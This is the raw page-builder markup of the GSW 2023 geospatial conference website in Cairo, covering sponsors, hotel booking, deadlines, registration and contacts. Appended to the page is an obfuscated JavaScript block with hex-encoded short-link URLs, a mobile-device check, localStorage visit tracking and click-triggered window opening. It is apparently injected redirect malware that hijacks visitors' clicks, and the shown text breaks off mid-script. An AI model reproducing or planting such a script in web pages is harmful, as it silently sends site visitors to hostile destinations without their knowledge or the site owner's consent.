src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684304999569{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305100989{margin-top: 50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 